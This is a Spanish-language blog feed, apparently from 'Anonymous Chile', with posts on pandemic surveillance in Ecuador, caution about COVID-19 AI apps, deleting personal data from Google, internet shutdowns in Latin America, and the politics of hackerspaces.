Aunque enfrentamos una situación excepcional a nivel global, las discusiones en torno al abuso de la tecnología por actores gubernamentales en la región no son nuevas. Es por esto que distintas organizaciones de América Latina y el mundo hemos señalado en reiteradas ocasiones la importancia de analizar estas implementaciones con el fin de evitar que estas conlleven el detrimento de derechos y libertades, vulnerando injusta, indiscriminada y violentamente nuestra privacidad como ciudadanxs y seres humanxs.

Además es importante señalar que en el contexto regional la brecha digital no es un tema que debería pasar desapercibido en este tipo de discusiones, pues 45% de las personas en América Latina no tiene acceso a los servicios derivados de la conectividad digital. Si los gobiernos apuestan a centralizar esfuerzos de comunicación, educación y asistencia a través de tecnologías y servicios que dependan del acceso a dispositivos conectados a internet, se refrenda una distinción social donde las desigualdades de acceso y privilegio económico impactarán profundamente en el apoyo que las personas más vulnerables puedan recibir.

Tecnologías de vigilancia durante la pandemia en Ecuador

Publicada el 06/05/2020 - 02/08/2021 por Anonymous Chile

Las organizaciones firmantes, especializadas en la promoción y defensa de los derechos humanos, expresamos nuestra preocupación por el anuncio relativo al monitoreo satelital para la georreferenciación de las personas en el contexto del cerco epidemiológico en Ecuador. El anuncio, realizado el 17 de marzo de 2020 por la Ministra de Interior, María Paula Romo, forma parte de las medidas adoptadas por el Gobierno para hacer frente a la crisis provocada por el COVID-19, en el marco de la declaración de estado de excepción.

Las tecnologías de vigilancia y monitoreo deben usarse con criterios de necesidad y proporcionalidad

Si bien las medidas adoptadas en el contexto del estado de excepción se orientan a ralentizar la propagación del virus con el fin de resguardar la salud pública, es primordial asegurar que el uso de las tecnologías de información y comunicación — especialmente tecnologías de vigilancia y monitoreo de la población — se haga con apego a criterios estrictos de necesidad y proporcionalidad, para salvaguardar el ejercicio de los derechos humanos que pueden verse negativamente impactados por estas medidas, particularmente la privacidad, el derecho a la integridad física y psíquica, y el derecho a no ser discriminado arbitrariamente.

Así lo señalaron el 16 de marzo pasado expertas y expertos en derechos humanos de Naciones Unidas, precisando que los Estados no deben abusar de las medidas de emergencia para vulnerar derechos humanos. “Si bien reconocemos la gravedad de la actual crisis de salud y reconocemos que el derecho internacional permite el uso de poderes de emergencia en respuesta a amenazas significativas, recordamos urgentemente a los Estados que cualquier respuesta de emergencia al coronavirus debe ser proporcionada, necesaria y no discriminatoria “.

Tal como explican las expertas y expertos en derechos humanos de las Naciones Unidas en su comunicado, existe peligro en que, justificándose en la emergencia, se implementen medidas que significan una reducción arbitraria de las libertades públicas y que –en ausencia de marcos legales e institucionales robustos– se vuelvan permanentes ante la imposibilidad de la ciudadanía de fiscalizar su adecuación, necesidad y proporcionalidad. Es por esto que recomiendan que “para evitar que tales poderes excesivos se conecten a los sistemas legales y políticos, las restricciones deben diseñarse limitadamente y deben ser el medio menos intrusivo para proteger la salud pública”.

La condición de salud de las personas, objeto de protección reforzada

Por su vinculación con la dignidad humana, la información respecto a la condición de salud de las personas es confidencial y personal y, con base en lo establecido en la normativa tanto nacional como internacional, debe ser objeto de protección reforzada para evitar que pueda ser utilizada en forma discriminatoria. La mayor parte de las legislaciones a nivel global consideran los datos de salud como datos sensibles dentro de su estatutos legales de protección, ya sea general o de la normativa sectorial sanitaria, y los someten a criterios estrictos de autorización para su procesamiento y a medidas más estrictas de sanción ante la vulneración de sus reglas de uso, almacenamiento y comunicación a terceros.

En Ecuador, la normativa constitucional es muy clara al respecto. Se establece en el artículo 66, inciso 11, 19 y 20, la reserva de la información personal, incluida aquella relativa a los datos de salud, que solo pueden ser difundidos por mandato legal o autorización personal. De igual manera, ley de derechos y amparo del paciente en sus artículos 2 y 4 establece el derecho a la atención digna y a la confidencialidad de la información en salud, lo que se refuerza en el artículo 61 de la ley orgánica de salud que obliga a las instituciones y profesionales de la salud a garantizar la confidencialidad de la información entregada y recibida. El código penal contiene disposiciones que tienen el objetivo de proteger la información reservada, personal y confidencial, como lo son los artículos 179 y 180, que establecen a la revelación de secreto profesional y la circulación de información restringida como delitos penales.

El código penal contiene disposiciones que tienen el objetivo de proteger la información reservada, personal y confidencial como lo son los artículos 179 y 180 del mismo, que establecen a la revelación de secreto profesional y la a circulación de información restringida como delitos penales.

Considerando lo delicado de la información en salud y su carácter confidencial, cualquier medida que implique la identificación de individuos con la condición de pacientes de enfermedades específicas puede exacerbar condiciones de vulnerabilidad preexistentes y puede convertirse en una fuente directa — o colateral — de acciones de discriminación arbitraria por quienes tengan acceso legítimo o ilegítimo a esa información, creando un estigma social cuyas consecuencias pueden ser tan severas como las de la enfermedad física misma, tal como dan cuenta experiencias recientes con el desarrollo de la pandemia COVID-19 en Corea del Sur. Es indispensable asegurar que la aplicación de las medidas de prevención y control de la pandemia no agrave la situación de vulnerabilidad de grupos minoritarios y personas que, por su condición económico-social u otros factores, presentan un mayor riesgo de afectación.

A tal preocupación se suma la evidencia existente sobre el alto nivel de imprecisión y falibilidad de los sistemas de vigilancia masiva, y del impacto que tienen en la seguridad personal y la privacidad de las personas debido a su nivel de intrusividad. En países que ya han reportado la utilización de sistemas de georreferenciación de su población con ocasión de la pandemia COVID-19 — incluso tratándose de sistemas no obligatorios para la población —, se han reportado errores en el sistema que permiten generar no solamente falsos positivos, sino también estigma en contra de determinados pacientes por las zonas geográficas de desarrollo de sus actividades cotidianas (por ejemplo, por encontrarse en las cercanías de barrios rojos). Además, permiten trazar vínculos entre pacientes que revelan información privada, lo que les hace susceptibles al escrutinio público, como en los casos de contagios en relaciones extramaritales o sometimiento a terapias específicas, por vía ejemplar.

La falibilidad de las técnicas de georreferenciación adquiere aún mayor gravedad cuando su uso se enmarca en la facilitación de la persecución penal de individuos que infrinjan medidas de aislamiento sanitario. Por ello, se debe asegurar que los procedimientos legales en torno a personas señaladas como infractoras de las medidas establecidas en el estado de excepción y de emergencia sanitaria se realicen con apego al debido proceso y a los estándares internacionales de derechos humanos, y que la impartición de justicia se lleve a cabo de manera independiente, competente e imparcial. Cabe recordar que para que una prueba tenga validez dentro de un proceso judicial esta no debe haber ser obtenida con violación de la constitución y la ley.

Las preocupaciones aquí abordadas respecto de la utilización de sistemas de georreferenciación de pacientes infectados de COVID-19 tienen lugar incluso en países que cuentan con una normativa específica de protección de datos personales, que proveen de un marco institucional para limitar abusos en la recogida y uso de tal información. La situación tendría una mayor gravedad en Ecuador, ya que a pesar de la garantía consagrada en el artículo 66 numerales 11, 19 y 20 de la Constitución de la República, el país carece a la fecha de una normativa legal y de una autoridad técnica e independiente que permita una adecuada supervisión de que las medidas a implementarse respeten los principios de adecuación, necesidad y proporcionalidad compatibles con el estado de derecho.

Es indispensable proteger a quienes trabajan en la defensa de los derechos humanos

Instamos al gobierno ecuatoriano a brindar las garantías necesarias para que la aplicación de las medidas de vigilancia y monitoreo no afecten a personas cuyo trabajo es esencial para asegurar el ejercicio de derechos humanos, como defensores y defensoras de derechos humanos o expertos y expertas en seguridad digital, entre otros. Respecto a ellas, desde las Naciones Unidas se ha señalado en forma categórica que las declaraciones de emergencia basadas en el brote de COVID-19 “no deben funcionar como una fachada para la acción represiva con el pretexto de proteger la salud ni usarse para silenciar el trabajo de los defensores de los derechos humanos”.

Por último, es imprescindible que el gobierno ecuatoriano entregue información suficiente sobre el alcance de la medida anunciada: el tiempo que estará vigente, el tipo de tratamiento, y sobre las condiciones de acceso, almacenamiento y seguridad de la información que se recopile. Del mismo modo, deben comunicarse con claridad los protocolos que se adoptarán para evitar que terceros — dentro y fuera de la administración pública — accedan a la información recopilada y la usen con fines ilegítimos. Ello redundará en el reforzamiento del nivel de confianza en las acciones del gobierno para enfrentar la crisis, como condición esencial para la seguridad y el bienestar de la población, y proveerá un nivel mínimo de garantía de la legitimidad democrática de cualquier sistema adoptado, que asegure su deshabilitación una vez superada la emergencia.

Resulta indispensable que el gobierno ecuatoriano, que en tiempo reciente ha invertido ingentes esfuerzos en conducir a la digitalización del país, aproveche la oportunidad de utilizar las tecnologías de información y comunicación para responder a la emergencia propuesta por el COVID-19 de manera compatible con los estándares del Sistema Internacional e Interamericano de derechos humanos, que forman parte del orden constitucional del Ecuador.

Organizaciones firmantes:

Access Now

Asociación para el Progreso de las Comunicaciones (APC)

Asociación por los Derechos Civiles (ADC)

Confederación de Nacionales Indígenas de la Amazonía Ecuatoriana (CONFENIAE)

Datos Protegidos

Derechos Digitales

Digital Defenders Partnership (DDP)

Fundación Acceso

Fundación Karisma

Hiperderecho

LaLibre.net

Movimiento Indígena y Campesino de Cotopaxi (MICC)

Taller de Comunicación Mujer (TCM)

TEDIC

Surkuna

Inteligencia artificial en épocas de pandemia

Publicada el 05/05/2020 - 02/08/2021 por Anonymous Chile

¿IA durante la pandemia?

En las últimas semanas hemos tenido noticias de lanzamientos no oficiales de aplicaciones, plataformas y análisis de todo tipo, basados en Inteligencia Artificial (IA), en relación a la Pandemia de Coronavirus: aplicaciones para celular que predicen el riesgo de un individuo a contagiarse con solo compartir la geolocalización; algoritmos que prometen diagnosticar coronavirus a partir de imágenes de tomografías o rayos x; sistema de diagnóstico a partir de la voz; predicciones sobre futuros números de casos positivos, fallecidos, recuperados; iniciativas que pretenden resolver el problema de subdiagnóstico; entre otros proyectos.

A simple vista parecería que la IA es una herramienta poderosa en la lucha contra el COVID-19. La misma narrativa parece replicarse, cada vez más, en medios de comunicación y redes sociales. Y si bien es cierto que la IA ha tenido un desarrollo destacado en años recientes, y su uso es exitoso y palpable (como por ejemplo cuando se procesan nuestras imágenes una red social para identificar personas y objetos, cuando hacemos traducciones en línea, filtrar spam, recomendación de productos y otras aplicaciones comerciales), es importante destacar que tales aplicaciones están basadas en la disponibilidad de grandes cantidades de datos y años de desarrollo y perfeccionamiento, sumado a que, en general, son aplicaciones no críticas.

Es por ello que invitamos a la población, y a los medios de comunicación, a ser cautos con el uso y la difusión de esas aplicaciones, plataformas y análisis, debido a que muchos han visto la oportunidad de generar impacto con la pandemia y no dudan en lanzar propuestas, que, en su mayoría, adolecen de una o varias de las siguientes fallas:

  • Falta de acceso a datos de calidad y en la cantidad que los algoritmos de IA requieren para brindar resultados confiables. Durante una pandemia con el sistema de salud en alerta y con riesgo de colapso, esa información no resulta fácil de conseguir. Los Estados recién están organizando esfuerzos para recolectar esos datos genuinos y poder ponerlos en manos de la comunidad científica.
  • No poseen una homologación por parte de los organismos de control, lo que requiere tiempo para que sean validadas por profesionales expertos y testeadas en el ámbito clínico.
  • Se utilizan heurísticas o recetas oscuras para procesar y comparar los datos, que son de de escaso o nulo rigor matemático y metodológico.
  • Siguiendo con la falta de rigor, se comparan curvas y se hacen extrapolaciones de otros casos y países, en las que los resultados son extremadamente sensibles a pequeños errores en la recolección de datos y en los protocolos de reporte, lo cual arroja conclusiones carentes de validez.
  • Requieren que el usuario ceda información personal sensible, como puede ser su historial de geolocalización, su estado de salud o incluso sus radiografías, sin una política clara de privacidad, ni de protección de datos. Y ésto en desarrollos apresurados e inmaduros, lo que supone un riesgo adicional de filtración de datos.

Resumiendo, la inteligencia artificial es una herramienta con mucho potencial y aplicable a las más diversas áreas, pero requiere acceso a datos confiables, revisiones y pruebas para evitar sesgos, y más aún, como cualquier dispositivo aplicado a la salud, requiere de homologaciones y aprobación por los organismos de control que aseguren su idoneidad y fiabilidad. Además, debemos utilizarla de manera crítica. De no ser así, se podría incurrir en conclusiones falaces, toma de decisiones erróneas, crear angustia y preocupaciones innecesarias, por lo que, nuevamente, exhortamos a la población, y los medios, a minimizar su uso y difusión, y en tal caso a no tomar sus predicciones como certeras bajo ningún aspecto.

Elimina toda tu información de Google

Publicada el 05/05/2020 - 02/08/2021 por Anonymous Chile

Internet es la herramienta de información más poderosa de la historia de la humanidad con mucha diferencia. No importa el tema sobre el que queramos indagar, la red casi siempre aportará algo de luz con tan solo realizar una búsqueda de unos segundos en Google.

Por suerte o por desgracia, también se puede acceder a una gran cantidad de información de cualquier persona con tan solo teclear su nombre y apellidos. Si bien es cierto que puede resultar útil, no a todos les gusta que su intimidad pueda ser violada de manera tan sencilla.

Por esa precisa razón, en el presente artículo mostraremos cómo borrar nuestra información personal del buscador de Google en la medida de lo posible siguiendo unos sencillos pasos.

Observa tu huella digital

Como es lógico, antes de pasar a la acción tendremos que investigar qué es exactamente lo que hay sobre nosotros en Internet, lo que se conoce popularmente como huella digital.

Para ello debemos entrar en el buscador de Google y buscar directamente nuestro nombre y apellidos. Hemos de ser ingeniosos y ponernos en la piel de alguien que quiera investigar sobre nosotros, por lo que también nos buscaremos con un solo apellido, diminutivo de nuestro nombre, etcétera.

Los resultados que muestre Google conformarán nuestra huella digital. Es posible que aparezcan nuestras cuentas en diferentes redes sociales, así como nuestro perfil en otros sitios web, etcétera. Asimismo, puede haber información que no esté relacionada directamente con vosotros, sino con personas con un nombre similar.

Elimina redes sociales

Como comentábamos, la mayoría de personas verán cómo su huella digital está protagonizada por sus redes sociales. Si queremos que desaparezcan del motor de búsqueda podemos hacer dos cosas: cambiarnos el nombre en dicha red social o borrar nuestra cuenta.

Como hay una cantidad inmensa de redes sociales, nos ceñiremos a enseñaros a eliminar la cuenta en las principales. En el caso de Facebook basta con entrar en su apartado de configuración, después en «General» y en » Administrar cuenta», desde donde podremos desactivar o eliminar la cuenta. O bien de otro modo, siguiendo el enlace directo en Eliminar cuenta

En Twitter es bastante parecido. Debemos acceder a la configuración del perfil, luego a «Cuenta» y pinchar en «Desactivar cuenta», tras lo que se nos señalarán los pasos a seguir.

En el caso de LinkedIn, la red social de contactos profesionales, habrá que dirigirse a «Ajustes y privacidad» y entrar en «Cerrar tu cuenta». En Instagram es necesario acceder a la versión de escritorio y pinchar en el botón «Editar perfil» situado al lado de nuestra foto y nombre de usuario, tras lo que nos aparecerá el botón «Desactivar mi cuenta» si hacemos scroll hacia abajo.

En otras webs

Una vez hayamos eliminado nuestra cuenta en las redes sociales mencionadas o cambiado nuestro nombre, dejaremos de aparecer en los resultados de Google, aunque puede demorarse unos días en reflejarse, no es algo instantáneo.

Como tardaríamos una eternidad en explicar cómo borrar cuentas en cada sitio, existe JustDeleteMe para facilitar el trabajo. Esta curiosa web ofrece los enlaces directos para borrar perfiles en multitud de plataformas y servicios de todo Internet, basta con buscar uno y hacer clic en el nombre en cuestión.

Pídeselo a Google

Si sigues sin conseguir eliminar de Google algunos resultados relacionados contigo, otra opción es contactar directamente con la división de la compañía encargada de estos aspectos.

En este sentido, Google cuenta con un formulario para solicitar el retiro de información personal. Eso sí, cabe recalcar que enviar el formulario no garantiza que vayan a borrar obligatoriamente la información que queremos del motor de búsqueda. El llamado derecho al olvido no se cumple siempre cuando hablamos de Internet.

Como se podrá observar, eliminar nuestro rastro de la red está en nuestras manos, al menos en la mayoría de los casos, pues se trata de sitios en los que estamos registrados (aunque ya ni nos acordemos de muchas de ellas). Así podremos moldear nuestra huella digital como mejor convenga.

Apagones de Internet y censura en América Latina

Publicada el 04/05/2020 - 02/08/2021 por Anonymous Chile

Las recientes protestas en Ecuador fueron un nuevo escenario para una práctica que se vuelve una tendencia preocupante en la región: el bloqueo y la disrupción del acceso a plataformas de redes sociales en contextos de manifestación social y política.

Las casi dos semanas de protestas en Ecuador contra las medidas de austeridad del presidente Lenín Moreno, que culminaron el pasado año 2019 con la derogación del decreto que diera origen a las protestas, fueron también el escenario de una serie de incidentes de disrupción al libre flujo de las comunicaciones y la información en internet. Según reportes de la organización Usuarios Digitales, servicios como WhatsApp y Twitter presentaron fallas en la descarga de videos e imágenes. Esta información fue reforzada a través del reporte publicado por la organización Netblocks, que señaló que los servidores de imágenes y contenido (CDN o proxys inversos) de Facebook y WhatsApp estuvieron inaccesibles a través del operador de telecomunicaciones estatal -Corporación Nacional de Telecomunicaciones (CNT)- desde la noche del 6 de octubre, en momentos durante los cuales las redes sociales veían aparecer imágenes y vídeos de la represión de las protestas y de la muerte de uno de los manifestantes.

La práctica de restringir el flujo de discurso y contenido multimedia durante protestas, especialmente en contextos de represión contra manifestaciones con carácter social y político, se ha presentado en la región en casos muy puntuales pero también sumamente preocupantes como son Venezuela y Nicaragua. En Venezuela, los bloqueos intermitentes de redes sociales se han vuelto una práctica constante -tal como ha reportado incansablemente la organización Venezuela Inteligente mediante su proyecto VESinFiltro – en combinación con bloqueos permanentes a medios de comunicación específicos.

En Nicaragua, según Netblocks, los cortes intermitentes de internet estuvieron presentes durante las protestas de 2018 y 2019 mediante “apagones” completos del internet en regiones específicas, que muestran una “fuerte correlación” entre los momentos de las disrupciones y apagones de la red y los momentos en que tenía lugar la represión de civiles. Lo anterior sugiere que estas medidas buscan ahogar el flujo de información durante los momentos clave de las protestas. Cabe recordar que situaciones similares se han presentado también en Venezuela, siendo quizá la más memorable el “apagón” de internet en el estado Táchira durante las protestas de 2014, que duró más de 36 horas y tuvo lugar en la zona más álgida de protestas durante el momento de mayor represión.

En todos los casos mencionados, los bloqueos y restricciones en el acceso a internet se han visto acompañados de otras medidas y ataques contra periodistas, defensores de derechos humanos y medios de comunicación tradicionales, marcando el debilitamiento del ecosistema de la información y la comunicación y -como consecuencia inevitable- el socavamiento del entorno democrático. En este contexto, el uso de las redes sociales como herramienta para la protesta y la participación política cobra particular relevancia al convertirse en una avenida alternativa para el ejercicio de las libertades civiles y políticas.

Aunado a esto, según un reporte de la Global Network Initiative, un país con conectividad alta puede perder al menos 1,9% de su PBI por cada día que los servicios de internet se ven afectados, un costo que equivale a 1% en el caso de un país de conectividad intermedia y 0,4% en un país de conectividad baja. Es decir, las disrupciones de la conectividad no afectan solo los derechos civiles y políticos de los ciudadanos de un país, sino que minan los derechos económicos y sociales colectivos, una preocupación especialmente grave en países en vías de desarrollo y en democracias frágiles y emergentes. Según la herramienta COST, desarrollada por Netblocks para medir el costo financiero de los apagones y bloqueos a internet, Venezuela ha perdido en total USD $402.803.069 a causa de los apagones, mientras que Ecuador ha dejado de percibir USD $82,146,854 y Nicaragua USD $4,724,285.

Ya en 2016, la Asamblea General de la Organización de Naciones Unidas declaró que las medidas intencionales para evitar o interrumpir el acceso o la diseminación de información en línea constituye una violación de las normas internacionales en materia de derechos humanos. Asimismo, la OEA ha repudiado de manera específica “los apagones y disrupciones arbitrarias para restringir el acceso a las redes de telecomunicaciones e internet”.

Queda claro que este tipo de medidas dejan de manifiesto una intención de restringir la libertad de expresión e información de manera desproporcionada e ilegítima, una decisión que es por completo incompatible con el debido funcionamiento de una democracia.

Hackeando los espacios

Publicada el 01/05/2020 - 13/03/2022 por Anonymous Chile

Historia

La historia de los llamados hackerspaces se remonta al momento en que el movimiento contracultural estaba por alcanzar un estado de madurez. Durante la década posterior en que los hippies intentaron establecer nuevas formas de relaciones sociales, políticas, económicas y ecológicas, se realizaron una gran cantidad de experiencias referentes a la construcción de nuevos espacios en los que vivir y trabajar. Eran considerados nichos para revivir y rescatar a las personas del monótono estilo de vida en que la sociedad burguesa conducía los espacios cívicos, desde los jardines de infantes hasta los cementerios, para resultar exactamente iguales entre sí y reproducir su orden patriarcal y económico.

Las políticas de establecer espacios abiertos fueron pensadas como declaraciones explícitas que confrontaban una sociedad capitalista (y en el Este: un comunismo autoritario) cuya propia estructura, propósito y modo de funcionamiento se consideraba en términos generales como alienante, para tomar el control de y para modificar sus relaciones y necesidades básicas humanas. Así, la fallada revuelta de los sesenta sobrevivió y floreció en las sombras de un omnipresente estilo de vida burgués.

La idea de cambio fue conjurada desde lo alto de los sueños nebulosos lisérgicos y discursos patéticos para alcanzar los sueños propios y/o tener los pies en tierra firme –para ser des-obamizado, si se quiere. Esta conversión ganó su fama debido al sueño hippie macro-político (“Tenía mucho que soñar anoche”, como decía el título de una clásica canción de pop psicodélico de The Electric Prunes) pero se deterioró completamente. Los hippies aprendieron que el cambio social y político requiere más que simplemente unir el mantra de los posters, canciones pop y fantasías de drogas que estaban promoviendo.

El mundo real era muy duro como para ser impresionado por un puñado de sucios burgueses marginados que cantaban mantras acerca del cambio. El imperativo capitalista del mundo real era demasiado efectivo para cambiar realmente. Y aún así, cuando todo finalizó en 1972, algunas de las personas involucradas no estaban listas para rendirse y entregarse al sistema para luego desaparecer en la integración –de ahí el uso de tácticas de micro-política. En lugar de tratar de transformar el viejo mundo en uno nuevo, la gente comenzó a construir pequeños nuevos mundos dentro del viejo mundo. Compusieron espacios abiertos donde las personas pudieran reunirse y probar diferentes formas de vivir, trabajar, tal vez amar, y lo que sea que hace la gente cuando quiere hacer algo.

Es necesario darle una mirada al desarrollo histórico de los movimientos políticos y su relación con los espacios y la geografía: la revolución estudiantil de 1969 fue conducida por la idea de recuperar los lugares y establecer una psicogeografía distinta entre el laberinto de la ciudad a través de la desviación. Del mismo modo, el movimiento autónomo de la década del setenta que cobró vida en Italia y luego influenció a personas en países de habla alemana y los Países Bajos se centró en la apropiación de los espacios, ya sea para centros juveniles autónomos como para la apropiación de las ondas de radio piratas.

En consecuencia, los primeros hackerspaces encajan mejor en una topografía contracultural, que consta de casas ocupadas, cafés alternativos, cooperativas agrícolas, empresas de gestión colectiva, comunas, centros de cuidado infantil no autoritarios y así. Todo esto estableció una estrecha red, para un estilo de vida alternativo en el corazón de las tinieblas burguesas.

Presente

Los hackerspaces brindaron lugares donde la gente podía ir a trabajar en un ambiente no-represivo, relajado y tranquilo (al menos, tanto como cualquier tipo de espacio o entorno dentro de la sociedad capitalista puede ser llamado no-represivo, relajado y tranquilo). Sociológicamente llamados ‘terceros espacios’, son espacios que rompen con el esquema dual de la estructura espacial burguesa, con lugares para vivir y lugares para trabajar (además de lugares para actividades recreativas).

Representan un camino integrador que se niega a aceptar un estilo de vida formado mediante tal estructura. Esto significa que pueden llegar a formas de trabajo cooperativo y no-represivo, por ejemplo, en problemas técnicos que pueden resultar en soluciones nuevas e innovadoras. Y allí es exactamente dónde la ‘vida equivocada’ de Adorno podría colarse. El sistema capitalista es una entidad altamente adaptable por lo que no sorprende que espacios y modos de vida alternativos proveyeran ideas interesantes que pudieran ser ordeñadas y comercializadas.

Ciertas características estructurales producto de este movimiento ‘indie’ fueron repentinamente muy aclamadas, aplicadas y reproducidas en laboratorios de desarrollo capitalistas. Estas cualidades se adaptan mejor a la tendencia por la que –finalizando los setentas– la sociedad burguesa comenzó a actualizarse y relanzarse usando las experiencias adquiridas a través de esos proyectos contraculturales. La cultura oficial cosechó el conocimiento obtenido en estos proyectos y lo aplicó.

Así, la revuelta de los sesenta y todas las micro-revoluciones que le siguieron resultaron una especie de refresco periódico. Como sistema, el capitalismo está siempre interesado en librarse de sus antiguos rasgos opresivos que pueden bloquear su evolución y perfeccionamiento en conjunto. Como un ejemplo: el eco-capitalismo se puso de moda, y resultó muy eficaz en la generación de “buenas riquezas” capitalistas y “buenos sentimientos” capitalistas. Hoy en día los hackerspaces, funcionan en forma distinta de como lo hacían inicialmente. Cuando el primer hackerspace se formó siempre habían claras distinciones (un “antagonismo”) entre “nosotras” (las personas resistiendo) y “ellas” (las personas controlando).

Cierta gente no quería vivir y trabajar dentro del esquema de trabajo burgués clásico y se negó a ser parte de su proyecto ideológico y político, por muy buenas razones. La alteridad de los espacios en ese entonces era determinada por la consistencia de una cultura dominante burguesa sobre la base de un orden dualista de guerra fría mundial. Una vez más demostraron ser terceros espacios de una clase diferente: ni Estado ni capitalismo de libre comercio. Y ser estructural e ideológicamente diferentes de eso había sido una importante declaración y postura política. En una sociedad de fácil distinción entre las categorías principal y clandestina, cada actividad llevada a cabo en el espacio abierto del tipo clandestino, es un paso alejándose de la dirección equivocada.

La misma práctica de hacer un uso personal de estructuras alternativas viene con la garantía de estar del lado bueno. Pero la sociedad pos-guerra fría estableció un orden diferente que afectaba profundamente la posición de los hackerspaces. Mientras que por un lado se fortaleció y se tornó más represivo, el sistema (¡ningún boludo!) aprendió a tolerar cosas que son distintas (de camino a su integración o asimilación) y a entender que siempre han sido los bordes de la normalidad donde crecía la nueva sustancia. Ordeñando cultura encubierta. Antes de eso, la intolerancia abierta y seguidamente la brutal opresión llevada a cabo contra los espacios contraculturales únicamente los hizo más fuertes y su necesidad más evidente (al menos donde la sociedad no tuvo éxito en su aplastamiento).

Así, las formas de vida alternativas se aplicaron idealmente como un rejuvenecimiento de lo que era viejo, aburrido, conservador e impotente para progresar y adaptarse en el constantemente cambiante presente burgués. Nuevas formas de resolver problemas técnicos (y estéticos) se cocinaron en el under y los burgueses cazadores de talento observaron de cerca para ocasionalmente seleccionar esto o aquello, tal como pasó en el campo de la música pop con el llamado rock alternativo de los noventas. Moda alternativa, ¡ahoi!

Por otro lado, los noventa marcaron el triunfo de la democracia liberal, tal como escribe Slavoj Žižek:

La caída del Muro de Berlín el 9 de noviembre de 1989 marcó el inicio de la “feliz década de 1990”. De acuerdo a Francis Fukuyama, la democracia liberal había, en principio, ganado. La era es generalmente vista como finalizada tras el 9/11. Sin embargo, parece que la utopía tuvo que morir dos veces: el colapso de la utopía política liberal-demócrata del 9/11 no afectó la utopía económica del mercado global capitalista, que ahora ha llegado a su fin.
(Žižek, 2008)

Es por tanto muy irónico que los geeks y nerds, mientras observan la muerte de la liberal-democracia en su forma política (libertades civiles concedidas a fin de mantener la paz social) así como en su forma económica (crisis) se vuelven defensores liberal-demócratas de una ideología que ya ha fallado. Sin las líneas de demarcación política de una sociedad de guerra fría, los hackerspaces cambiaron a veces sin notarlo. La agenda política fue multiplicada por problemas individuales que los tecno-nerds intentaron resolver en una agradable atmósfera sin miedo, estados no agresivos donde la agresividad del mercado fue suspendida; donde uno puede hablar de problemas y desafíos técnicos y creativos y desafiarse cortésmente con personas con ideas afines.

Como tal, el enfoque político se desvaneció en el camino a ser pequeños talleres-paraísos frikis. Las micro-políticas fallaron en la misma escala y con el mismo alcance que los antiguos proyectos macro-políticos que fueron pulverizados por la irreversibilidad del capitalismo. La idea de tener una revolución (de cualquier tipo) fue domesticada hacia un reformismo aséptico y las únicas revoluciones que yacían delante eran las semi-revoluciones tecnológicas de internet y sus brotes de red social. Sin las antiguas agendas políticas los hackerspaces se convirtieron en pequeños lugares que en realidad no hicieron diferencias fundamentales.

Comparable a la caída de las casas okupas obteniendo un estado de legalidad y convirtiéndose en nuevos proyectos de vivienda burguesa donde los bohemios urbanos copados viven sus vidas alternando continuamente entre el mundo del arte, lo clandestino, negocios de IT y agencias de publicidad. Este puede no ser el caso para todos los hackerspaces que existen hoy en día, pero debería notarse que esto le ocurre a la mayoría. Y mientras por un largo tiempo el esquema macro-político funcionó bastante bien para proporcionar la diferencia inherente que se había asociado a todas las actividades realizadas en los hackerspaces (incluso a las cosas más triviales como soldaduras, lecciones de alfarería o clases de malabares), es lo que falta ahora.

Debido a esta deficiencia los hackerspaces ya no pueden ser formados y politizados en una escala más amplia. Esto claramente significa que no importa lo que hagamos: nuestras comunidades de hackerspaces permanecen restringidas; no son nada más que el fluido de nutrientes para la cría de recursos humanos. (¡Soylent Google está hecho de personas!).

Futuro

Entonces, ¿qué se puede hacer al respecto? Realmente, no es muy difícil encontrar algo sobre lo que protestar. Vigilancia, lo que sea. Utilizar el prefijo “anti” no es un problema. Usar la regla 76 –siempre y cuando se pueda pensar en eso, se puede estar en su contra. Pero eso es demasiado simple. Nunca antes en la historia de la sociedad burguesa ha estado todo tan jodido como lo está ahora. Pero lo que falta en todas las prácticas que ocurren en los hackerspaces es una teoría concisa de a qué se parece la sociedad burguesa y qué debería ser atacado por nosotros construyendo y manteniendo espacios abiertos dentro de esa sociedad.

El hermoso enfoque alternativo que compartimos debería basarse en una teoría, lo que debe ser leído como: una agenda política que le de cierto glamour revolucionario a lo que realizamos a diario creando artilugios técnicos, tendiendo redes por el mundo o utilizando nuestra tecnología y habilidades de programación. Para alcanzarlo realmente necesitamos un sentido más explícito y un entendimiento de la historia de lo que estamos haciendo, de los acercamientos políticos y de las demandas que se hicieron hace mucho tiempo y aún están allí, escondidas en lo que hacemos ahora mismo.

Para comenzar nos gustaría organizar ciertos talleres en los hackerspaces donde podamos aprender acerca de filosofía, historia y otros aspectos que necesitamos recobrar en nuestras vidas. La teoría es un juego de herramientas para analizar y deconstruir el mundo. Además, necesitamos reflejar y entender lo que los hackerspaces de hoy hacen bajo el “benevolente” control de un cierto grupo de mayormente hombres blancos, trabajadores, técnicos, nerds y hábiles con las manos. Y que dan forma a una práctica propia que condena a la mayoría de los hackerspaces actuales. (Resulta difícil comprender que existen hackerspaces en algunas partes de Estados Unidos que no tienen un solo miembro afroamericano o latino. Pero nos gustaría mantener nuestra pedantería europea hacia nosotros mismos. Debemos observar a nuestra oh-tan-multicultural escena hacker en Europa y preguntarnos a nosotros mismos si los hackers de origen inmigrante de Turquía o los estados del norte de África están representados en números que uno puede esperar de su porcentaje de la población. O, simplemente, contar la representación femenina y ver si hacen el 50% de los miembros.)

Por lo tanto, nos encontramos con que los hackerspaces de hoy están excluyendo una gran cantidad de grupos étnicos y sociales que parecen no encajar o tal vez lo sienten así, y son ahuyentados por la preponderancia de hombres blancos nerds, sus (tal vez) bromas sexistas o excluyentes, o cualquier cosa que aporte a eso. O tal vez no tienen las habilidades adecuadas para comunicarse y/o cooperar con las manadas de geeks (o al menos pueden pensarlo).

Lo que se necesita es la inclusión no-represiva de todos los grupos marginados por la sociedad burguesa tal cómo ha sido la intención de los primeros hackerspaces en la historia de la contracultura. Si aceptamos la idea marxista que la misma naturaleza de la política eśtá siempre en el interés de los que actuan, las políticas de los hackerspaces son por ahora en el interés de hombres blancos de clase media.

Zoom vulnera la privacidad filtrando información y exponiendo las comunicaciones

Publicada el 30/04/2020 - 02/08/2021 por Anonymous Chile

